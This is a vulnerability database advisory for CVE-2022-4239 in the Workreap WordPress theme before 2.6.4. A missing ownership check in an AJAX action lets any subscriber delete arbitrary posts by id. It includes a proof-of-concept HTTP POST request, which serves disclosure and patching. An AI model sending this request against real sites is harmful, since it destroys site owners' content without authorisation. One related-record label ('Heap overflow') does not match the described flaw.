Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbVeshraj GhimireWPVDB-ID:1C163987-FB53-43F7-BBFF-1C2D8C0D694C
HistoryDec 02, 2022 - 12:00 a.m.

Workreap < 2.6.4 - Subscriber+ Arbitrary Posts Deletion via IDOR

2022-12-0200:00:00
Veshraj Ghimire
wpscan.com
5
workreap
subscriber+
arbitrary posts deletion
idor
security issue
theme vulnerability

0.001 Low

EPSS

Percentile

23.5%

JSON

The theme does not verify that an addon service belongs to the user issuing the request, or indeed that it is an addon service, when processing the workreap_addons_service_remove action, allowing any user to delete any post by knowing or guessing the id.

PoC

POST /testt/wp-admin/admin-ajax.php HTTP/2 Host: host Cookie: [Subscriber+] Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 65 action=workreap_addons_service_remove&id;=6191&security;=295c6a26b2

CPENameOperatorVersion
workreaplt2.6.4

Related

cve 1
cvelist 1
prion 1
nvd 1
wpexploit 1
cve
cve
CVE-2022-4239
2022-12-26 13:15:13
cvelist
cvelist
CVE-2022-4239 Workreap < 2.6.4 - Subscriber+ Arbitrary Posts Deletion via IDOR
2022-12-26 12:28:20
prion
prion
Heap overflow
2022-12-26 13:15:00
nvd
nvd
CVE-2022-4239
2022-12-26 13:15:13
wpexploit
wpexploit
Workreap < 2.6.4 - Subscriber+ Arbitrary Posts Deletion via IDOR
2022-12-02 00:00:00

0.001 Low

EPSS

Percentile

23.5%

JSON
Related for WPVDB-ID:1C163987-FB53-43F7-BBFF-1C2D8C0D694C
cve1cvelist1prion1nvd1wpexploit1